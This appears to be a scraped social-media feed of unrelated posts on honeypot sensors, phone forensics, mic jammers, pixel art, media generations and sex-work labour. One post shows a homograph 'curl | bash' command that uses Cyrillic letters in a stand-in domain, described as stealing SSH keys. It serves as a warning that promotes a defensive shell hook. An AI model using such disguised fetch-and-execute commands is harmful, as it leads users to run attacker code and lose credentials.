Josh Krueger @_defaulty

early in my career I was designing software for contact centers -- turns out it was all citrix VMs displayed on the absolute cheapest monitors you could imagine. did a user interview, they were complaining about a missing feature, a snooze button or something. the button was there. they just literally couldn't see it, the monitors rendered basically any shade of grey as white. still learning that lesson.

Jacob Matson @matsonj

a week ago

how to build empathy for your users, honestly love this

74 185 7K 438K 468

Howdy folks! Taking a break from my twitter break to let yall know that we released a new @GreyNoiseIO product yesterday. It's called Project Swarm. We've been quietly not-so-quietly working on it for a few years. You can buy it now. It costs $1. There are lots of vulnerabilities on edge-facing apps. To catch in-the-wild exploitation of them, we @ GreyNoise run sensors on the internet. New AI models means more vulnerabilities being identified and exploited, and FASTER. Long term, software and hardware will probably get better, but in the meantime we're gonna have to deal with A LOT of vulnerabilities. At GreyNoise, the sensors we run are basically honeypots- we bait attackers to scan and exploit them which enables us to learn where the attackers are, which vulnerabilities they are exploiting, what it drops, and what it looks like on the wire. From ~2020-now it took us years to build up our fleet. Now anyone can use our new product to deploy their own sensors on their own networks, or an entire fleet of any size, in a day. You can rip back the data and do whatever you want with it. You can resell it, put it into your product, or just stare at it- whatever you want! On our side, we aggregate the data and pour it into a community dataset that everyone shares. As more people join, the data gets bigger and better. Couple neat features: - Sensor deployment is a single bash command on any modern linux distro that supports iptables and wireguard. - Sensors and vulnerable software (profiles) are abstracted into different logical concepts, which means the "what" and "where" are different things, and the sensor is not constrained by the compute required to run the vulnerable software. Also, no matter how hacked the profile (honeypot) gets, it can't touch your host sensor or the rest of your network. - Sensors can run fake honeypots, real software, or even real hardware (bridged with a raspberry pi) like old crappy routers and modems (or expensive firewalls and VPN gateways 👀) - You can create dynamic blocklists that block IPs sourced from your own sensors in real time, so if a remote IP address *looks at your network* the wrong way, you block them instantly. - All the PCAP data is available to you in a gorgeous and intuitive interface at near real time and fully enriched against all of our (thousands of) rules. We're working on the host metadata (malware, syscalls, host behaviors) as well, but this will come later. - If we don't tag a CVE that's interesting to you, you can write a Suricata rule to tag it yourself once and your data gets tagged with it in real time forever. - You can instantly download PCAPs of any exploits that hit your sensors. - If you don't want your data shared with the community dataset, you can talk to our team and we'll work out rights to make it private. Check it out! There's a lot of moving pieces to make this work and we expect bugs, but it's available right now. Join the fight! greynoise.io/project-swarm

ctf frontend i made for openecsc 2025 :3

Basti Ui ✌️ @BastiUi

a month ago

Il y a 15 ans, on supprimait des tickets de cette manière sur iPhone. Où est passé le fun des interfaces aujourd'hui ? Pourquoi l'a-t-on perdu ?

66 162 4K 377K 663

my biggest pixel art — space elevator

LOLFSAAS Living off Free SaaS Hundreds of SaaS platforms with free tiers, documenting abuse surface, opsec risks, authent methods, C2 framework mappings, and operational limits. lolfsaas.github.io

“I never touched your phone.” The first post showed how phones can reconstruct a meeting someone tried to hide. This time someone insists they never touched your device. “I never opened your messages.” At first glance nothing looks wrong. No new messages sent. No settings changed. Nothing obvious. But phones quietly record small system events that tell a different story. At 1:18 AM the device wakes. No notification. No call. No alarm. At 1:19 AM Face ID fails twice. One second later the correct passcode is entered. The phone unlocks. At 1:20 AM the Messages app opens. No messages are sent but the logs show multiple conversations being opened. At 1:22 AM the Photos app opens. The user scrolls through the gallery for nearly three minutes. During that time the system generates image cache files and thumbnail previews. At 1:25 AM the search bar inside the photo gallery is used. Keyword entered: Alex. At 1:27 AM the phone locks again. No messages sent. No photos deleted. Nothing visibly changed. But the device still recorded everything. Failed biometric attempts. Passcode entry. App launches. Conversation access. Photo searches. Now read the statement again. “I never touched your phone.” Digital forensics rarely relies on a single artifact. It reconstructs behavior from dozens of tiny traces a device records without the user realizing it. Your phone is not just storing data. It is quietly documenting how it is used. #digitalforensics #DFI #CyberSecurity #Ghanaat69

keyboard_arrow_left Previous keyboard_arrow_right Next

Julian Derry @CyberSamuraiDev

3 months ago

How mobile forensics can uncover a lie even when phone logs are deleted. Someone tells their partner they stayed home all evening and never met anyone. At first glance the phone looks clean. Messages deleted. Call logs cleared. Photos removed. But mobile forensics does not rely

24 154 761 98K 681

world's only first-person sheet of paper

This is likely snake oil, but tons of people are boosting it. Ultrasonic mic jammers are real & a fraction of the price. What they claim is new: using AI to detect mics. There are ways to find hidden mics. The TSCM space (bug sweepers) has tons of tricks that seem like pure magic. Have you ever listened to transistors turn on & off inside of an electronic device? Seen what a non-wireless camera sensor sees from across the room because every copper trace on a PCB is still an antenna? …I have 😎. Hell, the first time I heard the “heat beat” of one of my naughty little OMG Cables, it was kinda reminiscent of hearing the heartbeat of my literal unborn kids! 😂 … anyway, you also have thermals, magnetics, etc. But most of these tricks require that you either sweep a detection device within a few cm of the bug, or you have a bulky antenna pointed directly at the bug. This “Deveillance” device is a small stationary puck that you place in the center of the space you want to protect. So what can you do with a small stationary object to detect mics? Well, anyone who’s used an ultrasonic jammer knows that most of the space is going to be filled with ultrasonic emitters, especially if you want the claimed 2 meter range. So that leaves a pretty small space for the detection electronics. You could do wireless protocol discovery. WiFi, BLE, etc. This would be easy. But it’ll only find a fraction of hidden mics. You could do wideband RF sweeps to detect any active radio emissions. Here, AI could actually help identify based on raw signal. But this already feels like a stretch for this product. Lots of legit wireless mics are going to slip through the cracks with the minimal hardware that fits in a small puck. But let’s say we make it this far. What about every mic that is not actively transmitting? Saving to local storage for later retrieval, etc. Well, you could use your ultrasonic emitters to create saturated pulses into the mics, which in turn will create electrical impulses down the copper lines between the mic & whatever catches the signal. Every bit of copper, no matter the length, is also an antenna. So you catch those emissions and look for signals that match your own ultrasonic emissions. Packing equipment sensitive enough to do this inside a little puck though…. Ehhhh And after all that, you are still blind to passive MEMS microphones. And more so: there are already ways to defeat ultrasonic jammers too. However, this device doesn’t claim to protect you against bugs and other hidden mics. It’s very tightly constrained to: “prevents smart devices and AI recorders from picking up your voice” That’s an incredibly narrow scope. Existing ultrasonic jammers cover that scope pretty easily.

Aida Baradari @aidaxbaradari

3 months ago

Today, we're introducing Spectre I, the first smart device to stop unwanted audio recordings. We live in a world of always-on listening devices. Smart devices and AI dominate our world in business and private conversations. With Deveillance, you will @be_inaudible.

1K 5K 42K 4.5M 22K

One of my favorite things about pixel art retro games is when they had like a neon wireframe or schematic drawing. Really we should bring that visual trope back. A short thread of some of my favorites, starting with Alzadick:

Random Atmel logo on a chip in the NBC logo animation for the super bowl

I like to think about extinction events when it comes to media. Analog Zero: (Born ~2005) Generation who will likely never touch analog encoded media. Physical Zero: (Born ~2012) Generation who will never interact with non-bitstream media. Past this it get’s more speculative, but we can take a few guesses... Broadcast Zero: (Born ~2015) Generation who never experienced everyone watching the same thing at the same moment. Media ingested asynchronously. Capture Zero (Born ~2023) Generation that will never assume a video or image represents a physical event that actually occurred. We might be getting close to a handwriting zero, but I don’t think we’re quite there yet. One of the most bizarre ones I’ve seen is the concept of a future “Stranger Zero”; as in a generation emerging that finds meeting someone without information about them first alien. What else?

keyboard_arrow_left Previous keyboard_arrow_right Next

Be honest. When was the last time you actually read a command before pasting it into your terminal? Because these two lines look identical: curl -sSL https://install.example-cli | bash curl -sSL https://іnstall.example-clі | bash One installs your tool. The other steals your SSH keys. That і? Cyrillic. Not Latin. Your browser would block it. Your terminal doesn't even blink. Vibe coding made this 100x worse. Everyone's pasting commands from ChatGPT and random repos like it's nothing. We're all one bad curl | bash away from losing everything. So I built the fix: "tirith". Invisible shell hook. Catches homograph attacks, ANSI injection, hidden commands, dotfile overwrites before they execute. 30 rules. Local only. No telemetry. github.com/sheeki03/tirith

ATM Jackpotting, still alive in 2025 Two attackers physically popped ATMs, plugged in a laptop, dropped malware, and forced machines to dump all cash. This isn’t an isolated case. DOJ has charged dozens tied to multi-state jackpotting rings, including members of Tren de Aragua. Same playbook, scaled. Props where due: this entire class of attacks was dragged into the open by Barnaby Jack, who live-demoed ATM jackpotting at Black Hat in 2010 and literally coined the term. He showed that ATMs were just poorly defended computers with cash attached.

I’m not making this up. Probably the most comprehensive meta-analysis is from Rayner (2016): doi.org/10.1177/152910… This is an interesting paper on “forced” stopped subvocalization jamming phonological coding: doi.org/10.1016/S0022-… LessWrong also has a nice writeup “The Comprehension Curve”: lesswrong.com/posts/bxkEshxK…

Being an OF model is genuinely one of the hardest jobs in the modern economy, and people only deny that because they fundamentally misunderstand what the work actually involves. It is not “posting a few pics and getting rich” It is running a full scale digital business where we are the product, the brand, the marketing team, customer support, PR, legal risk, and emotional labor all at once. We conceptualize content, plan shoots, manage lighting, editing, scheduling, and consistency across multiple platforms just to stay visible in algorithms that actively punish inactivity. We market nonstop while navigating constantly shifting platform rules that can erase income overnight through shadowbans, reports, or policy changes. We manage subscriptions, pricing, custom requests, retention, upsells, daily engagement, and audience psychology in an oversaturated market where attention is fleeting and competition is ruthless. On top of that, we face unprovoked harassment simply for working. Strangers feel entitled to insult us, degrade us, moralize our existence, and treat us as less intelligent or less human because of how we earn money. People project resentment and insecurity onto us, then turn around and claim we “don’t have real jobs” while actively consuming or obsessing over the content they pretend to hate. There is no HR department. No paid time off. No benefits. No guaranteed paycheck. Income fluctuates based on algorithms, audience behavior, platform instability, and public sentiment. We are always “on” because disappearing for even a short period can permanently damage earnings and visibility. And unlike most jobs, our work follows us everywhere. It is permanent, searchable, and endlessly judged by people who will never meet us but feel comfortable forming loud opinions about our character, intelligence, and worth. Calling this “easy” says less about the work and more about how quickly people dismiss labor once it becomes sexualized, stigmatized, or financially successful outside traditional systems. If it were actually easy, everyone would be doing it successfully. Most don’t last. You don’t have to respect the industry. You don’t have to participate in it. But pretending it isn’t demanding, mentally taxing, real work is willful ignorance at best and insecurity at worst.

U.S. Rubber

Ben @B_Garelick

5 months ago

VIBRIN is a peak material name

3 2 16 11K 5